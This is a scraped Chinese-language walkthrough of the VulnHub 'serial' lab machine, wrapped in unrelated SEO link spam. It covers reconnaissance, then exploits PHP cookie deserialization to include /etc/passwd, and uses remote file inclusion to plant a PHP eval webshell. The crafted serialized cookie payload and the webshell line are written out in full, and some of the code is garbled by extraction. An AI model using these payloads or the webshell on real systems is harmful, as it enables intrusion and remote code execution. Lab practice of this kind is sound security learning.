当前位置: 首页 > news >正文

怎样推广网站平台wordpress专题

怎样推广网站平台,wordpress专题,网站正常打开速度,wordpress 自动内链环境搭建 下载 https://download.vulnhub.com/serial/serial.zip 解压出来就是这种 你会得到一个这样的文件#xff0c;这里使用VMware新建一个虚拟机#xff0c;这里记录比较重要的几部分。 这里就是使用我们刚才下过来的。 漏洞过程详解 1.信息收集 打开靶机#xff0…环境搭建 下载 https://download.vulnhub.com/serial/serial.zip 解压出来就是这种 你会得到一个这样的文件这里使用VMware新建一个虚拟机这里记录比较重要的几部分。 这里就是使用我们刚才下过来的。  漏洞过程详解 1.信息收集 打开靶机在kali虚拟机中进行主机存活探测 arp-scan -l 分析一下可知靶机IP地址位192.168.3.131 2.端口扫描  nmap -p- 192.168.3.131 --min-rate10000以最小速率10000扫描 3.目录扫描 可以都访问一下 在backup目录下发现bak.zip文件下载下来 4.漏洞扫描 分析文件 index.php 发现三个文件有包含的关系放到同一文件中分析 ?phpclass Log {private $type_log;function __costruct($hnd) {$this-$type_log $hnd;}public function handler($val) {include($this-type_log);echo LOG: . $val;}}class Welcome {public function handler($val) {echo Hello . $val;}}class User {private $name;private $wel;function __construct($name) {$this-name $name;$this-wel new Welcome();}function __destruct() {//echo bye\n;$this-wel-handler($this-name);}}if(!isset($_COOKIE[user])) {setcookie(user, base64_encode(serialize(new User(sk4))));} else {unserialize(base64_decode($_COOKIE[user]));}echo This is a beta test for new cookie handler\n; ?发现有三个类如果用户没有COOKIE就给用户生成一个名为sk4的COOKIE否则将用户的COOKIE反序列化 COOKIE的值为对User对象的序列化结果进行Base64位编码后的结果 User类中有两个魔法方法分别为创建和销毁时调用 我们代理抓包进入repeater模块  尝试将COOKIE删除相应包中带来了COOKIE,用户名为sk4 将COOKIE撤销回去 5.尝试更改 COOKIE 选中COOKIE在burp的解码器中可以看出这里的cookie经过了URL编码将%3D改成 再次选中COOKIE将解码方式改为Base64可以看出结果为User类的序列化结果  进行Base64解码修改用户名及其长度 O:4:User:2:{s:10:Username;s:5:mzqms;s:9:Userwel;O:7:Welcome:0:{}}7 漏洞利用 漏洞存在思考利用 继续分析代码发现Wel实例销毁时调用了公共方法hadler而hadler方法不止在Welcome类中有在Log类中不仅存在hadler方法还存在文件包含所以替换COOKIE中的Welocome实例 由于目标系统为Linux所以文件包含passwd 这里可以直接用我下面的 O:4:User:2:{s:4:name;s:3:sk4;s:3:wel;O:3:Log:1:{s:8:type_log;s:11:/etc/passwd;}} 发现passwd文件显示了出来 尝试远程文件包含 开启Windows系统的服务器根目录下创建一个1.txt文件 更改COOKIE要改成自己的window的ip 将1.txt改为一句话木马 ?php eval($_POST[cmd]); ?打开蚁剑连接将Cookie放入Http头中 测试连接连接成功 浏览目录发现根目录下有credentials.txt.bak文件 应该是sk4用户的密码由于22端口开启尝试远程连接 ssh sk4192.168.3.131 登陆成功依旧浏览目录发现flag
http://www.hkea.cn/news/14395647/

相关文章:

  • 公关做的好的网站seo网站项目讲解
  • 龙泉驿网站建设wordpress网站加密
  • 加强 廉政网站建设企业商城网站开发
  • 网站功能报价wordpress 前台关闭
  • 中外商贸网站建设中英互译网站怎么做
  • 义乌做公司网站国外 网站页面
  • 宁波网站建设设计公司信息电脑游戏排行榜2020前十名
  • 定制网站大概多少钱网站推广站点建设与策划
  • 网站建设空间空间有几种类型手机免费个人网站建站
  • 刘强东自己做网站临沂百度公司地址
  • 手表到哪个网站买网站的动画效果代码大全
  • 石家庄移动端网站建设做黑彩网站能赚钱吗
  • 万和城网站wordpress如何正常打开二级菜单
  • 领动营销网站建设wordpress登录按钮
  • 德州哪里有做网站的WordPress句子主题
  • 自适应型网站建设怎么做淘宝优惠券的网站
  • 三河网站建设-七天网络百度模板网站模板
  • 做网站前需要准备什么软件wordpress metaslider
  • 网站系统升级需要多久怎么做抽奖网站
  • 做pos机网站有必要么技术支持上海网站建设
  • 黄冈网站建设公司制作网站wordpress主题 dux主题5.3
  • 沈阳市城乡建设网站黄骅市有什么好玩的地方
  • 兼职做网站挣钱么开发网站的步骤
  • 做网站接广告赚钱吗用境外服务器做网站
  • 装饰公司网站php源码东莞市建设公共交易中心网站首页
  • 道客网站建设推广福州网站开发大概费用
  • 网站后台模板如何使用海口网站建设是什么意思
  • 二学一做网站广州动漫制作公司
  • 济南建设网站wordpress企业外贸主题
  • 做加盟正规网站做cms网站步骤